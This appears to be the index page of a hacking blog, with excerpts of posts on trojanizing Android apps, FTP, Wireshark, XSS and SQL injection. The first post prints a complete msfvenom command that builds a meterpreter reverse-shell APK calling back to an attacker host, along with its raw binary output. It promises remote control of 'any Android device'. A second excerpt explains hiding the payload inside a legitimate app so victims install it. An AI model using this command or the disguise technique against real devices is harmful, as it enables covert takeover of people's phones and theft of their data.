Posts

Nasha Exploit Injecting As A Metasploit Payloads Apk Into Android Applications To Remote Control Any Android Device

Image
On the kali linux terminal type - (root💀diago)-[~]# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.*.* LPORT=4444 R > Nasha.apk   [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload No encoder specified, outputting raw payload Payload size: 10184 bytes PD�>T�����PndroidManifest.xml��KoSGǏ�@�qB�1y@ O��@��@��"��]T�`B�▒+8��Z������� U�K>@�]tQU�˪� uY� S�V{�B��F�E*~&B��n�,tz��                       =�����^@?B�@B3���2�S��g�7ë"�@��(��>�^B�a�<��YMtz��"�z����z�]�!� �j� Nh���k�f�              �} }                  ��^A�uD����=��_�����7���P=za�v�m�m�<~��r�$C���K▒q%����}���T@�]�����K����=�z��-FM��s\)E{��MK?��G ��o�~��3��I�?��V�"ε2�qԏ�te        ���;�� �$jR�<�ef�#5�=z�T�8-#�5����.��h��3�~��O��t       ��i��^��ۼ���5��~%S,��C-C> \M?s�KI�az_/��[vγ�▒��▒�0�ȸ�2���E��,^�9�Ĕ�2z�▒��d�_��F*�z���lI򈘹�±,����*���7�eZO� X^�^�H�����X{�j�7ތY�u���l���ά�K�s�$��+&g

Embed a Metasploit Payload in an Original .Apk File 2

Embed a Metasploit Payload in an Original .Apk File | Part 2 – Do It Manually Hi guys, I'm here again with my second tutorial, as I promised. Metasploit's flagship product, the Meterpreter, is very powerful and an all-purpose payload. Once installed on the victim machine, we can do whatever we want to their system by sending out commands to it. For example, we could grab sensitive data out of the compromised system. The Meterpreter payload also comes as an installable .apk file for Android systems. Great! Now we can use Metasploit to compromise Android phones also. But if you have tried out these payloads you would know that they do not look convincing. No one in their right mind is going to install and run such an app, which apparently does nothing when it is opened. So how are we going to make the victim run the payload app in their phone? One of the solutions is that you can embed the payload inside another legitimate app. The app will look and behave exactly as the original

Injecting Metasploit Payloads into Android Applications

 Injecting Metasploit Payloads into Android Applications It is possible to use a legitimate Android application as a Trojan in order to exploit the actual device of the user. The reasons of why this test is important in every android security assessment is because it would allow the penetration tester to discover if there are certain protections around the binary in place. If there are not and the application could be trojanized by a malicious attacker then the client should be aware. The process of injecting Metasploit payloads into Android applications can be done both manually and automatically. This post will examine the automated process. However if in an engagement time is not a factor then the manual method should be considered. Payload Generation Before anything else the payload needs to be generated that it will be used in order to compromise the mobile device. Metasploit Framework could be used for this activity since it can produce a payload and then extract it as APK file.

FTP Commands for Linux and UNIX

FTP, by itself, is not a reliable way to exchange sensitive business information because it is prone to security attacks. Serv-U MFT Server supports FTP, FTPS, SFTP and HTTP/S protocols for file transfer over IPv4 and IPv6 networks. Give it a try FTP (File Transfer Protocol) is a standard network protocol used to exchange files between computers on a private network or through the Internet. There are three ways in which FTP is commonly accessed: * Command-line FTP client. * Web browser. * Graphical FTP clients. The first two are straightforward methods that allow you to directly use a Web browser (such as Google Chrome, Firefox, Internet Explorer) or an FTP client application (such as FTP Voyager®) to connect to the FTP server to exchange files. Using the command-line interface, you need to enter a set of commands to send or receive files from other computers. Windows, Mac OS X, and Linux operating systems have built-in command-line clients that can be used for establishing an FTP conn

Dark Academy - Kali Linux Information Gathering Tools WIRESHARK

Image
Wireshark Package Description Wireshark is the world’s foremost network protocol analyzer. It lets you see what’s happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions. Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998. Wireshark has a rich feature set which includes the following: Deep inspection of hundreds of protocols, with more being added all the time Live capture and offline analysis Standard three-pane packet browser Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility The most powerful display filters in the industry Rich VoIP analysis Capture files compressed with gzip can be decompressed on the fly Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM,

Dark Academy - Kali Linux Information Gathering Tools NMAP

Understanding Cross-site Scripting Vulnerability - DARK ACADEMY ( Academy of darkness)

Image
Cross-site scripting In this section, we'll explain what cross-site scripting is, describe the different varieties of cross-site scripting vulnerabilities, and spell out how to find and prevent cross-site scripting. What is cross-site scripting (XSS)? Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, t

Dark Academy - How to hack with SQL injection attack

Image
SQL injection In this section, we'll explain what SQL injection is, describe some common examples, explain how to find and exploit various kinds of SQL injection vulnerabilities, and summarize how to prevent SQL injection. What is SQL injection (SQLi)? SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is abl